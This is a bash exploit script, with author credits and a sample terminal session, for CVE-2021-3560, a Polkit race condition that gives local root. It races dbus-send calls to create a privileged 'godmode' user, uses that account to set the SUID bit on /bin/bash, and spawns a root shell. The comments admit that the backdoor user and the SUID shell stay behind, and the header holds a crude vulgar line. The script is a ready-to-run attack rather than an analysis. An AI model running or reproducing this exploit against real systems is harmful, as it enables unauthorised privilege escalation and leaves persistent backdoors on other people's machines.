#!/bin/bash

# Exploit by: Marshall Whittaker / oxagast
# oxagast@oxasploits.com
# Discovery by: Kevin Backhouse
# Polkit 0.113 - 0.118 LPE via Race Condition
# CVE-2021-3560
# https://oxasploits.com/posts/exploit-archive-partial-disclosure/
# Note: you will manually need to remove the godmode user
# as well as chmod a-s /bin/bash and rm /tmp/oneup.sh afterwards.
# My neck, my back lick it lick my pussy and my crack.
#
# [marshall@jerkon CVE-2021-3560]$ ./polkit_godmode_0day.sh 
# Error org.freedesktop.DBus.Error.UnknownMethod: No such interface ?org.freedesktop.Accounts.User? on object at path /org/freedesktop/Accounts/User
# ./polkit_godmode_0day.sh: line 13: kill: (197626) - No such process
# Error org.freedesktop.DBus.Error.UnknownMethod: No such interface ?org.freedesktop.Accounts.User? on object at path /org/freedesktop/Accounts/User
# ./polkit_godmode_0day.sh: line 13: kill: (197630) - No such process
# Error org.freedesktop.DBus.Error.UnknownMethod: No such interface ?org.freedesktop.Accounts.User? on object at path /org/freedesktop/Accounts/User
# Password: 
# [sudo] password for godmode: bash-5.1# 
# bash-5.1# id; whoami;uname -a;
# uid=1000(marshall) gid=1000(marshall) euid=0(root) egid=0(root) groups=0(root),998(wheel),1000(marshall)
# root
# Linux jerkon.oxagast.org 5.10.41-1-MANJARO #1 SMP PREEMPT Fri May 28 19:10:32 UTC 2021 x86_64 GNU/Linux
# bash-5.1# 

function sploit {
  P=$(openssl passwd -5 a);
  for i in {0..10}; do
    dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:godmode string:"gg" int32:1 & sleep 0.002s ; kill $!
    ID=$(cat /etc/passwd | grep godmode | cut -d ':' -f 3 | tr -d '\n');
    dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User$ID org.freedesktop.Accounts.User.SetPassword string:$P string:god & sleep 0.002s ; kill $!
  done;
  sleep 0.5;
  echo 'echo a | sudo -S chmod a+s /bin/bash' > /tmp/oneup.sh;
  chmod a+x /tmp/oneup.sh;
  (sleep 1; echo a) | socat - EXEC:'su godmode -c /tmp/oneup.sh',pty;
  if [ -u /bin/bash ]; then
    spawn;
  fi;
}
function spawn {
  if [ -u /bin/bash ]; then
    /bin/bash -p;
  else
    echo error...
  fi;
}

sploit;